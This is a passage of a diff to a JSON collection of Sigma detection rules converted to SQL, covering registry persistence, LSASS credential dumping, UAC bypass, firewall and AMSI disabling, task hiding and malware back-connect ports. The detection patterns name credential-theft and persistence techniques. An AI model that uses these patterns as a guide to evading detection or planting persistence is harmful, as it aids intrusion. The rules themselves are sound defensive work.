'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_add_port_monitor.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Usage of Renamed Sysinternals Tools - RegistrySet", - "id": "8023f872-3f1d-4301-a384-801889917ab4", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", - "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", - "status": "experimental", - "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. 
Which will get invoked when an application crashes", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" ], - "filename": 
"registry_set_dbgmanageddebugger_persistence.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Sysmon Event Logging Via Registry", - "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", - "status": "experimental", - "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", - "author": "B.Talebi", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "status": "test", + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate driver altitude change to hide sysmon" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": 
"Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": 
"272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Legitimate administrators removing applications (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings 
Experience", - "author": "frack113", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1070", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' 
AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "status": "test", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ 
"attack.defense_evasion", - "attack.t1562.004" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\') OR (NewProcessName LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Everything.exe' ESCAPE 
'\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": 
"registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft 
Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((NewProcessName LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", - "status": "experimental", - 
"description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT 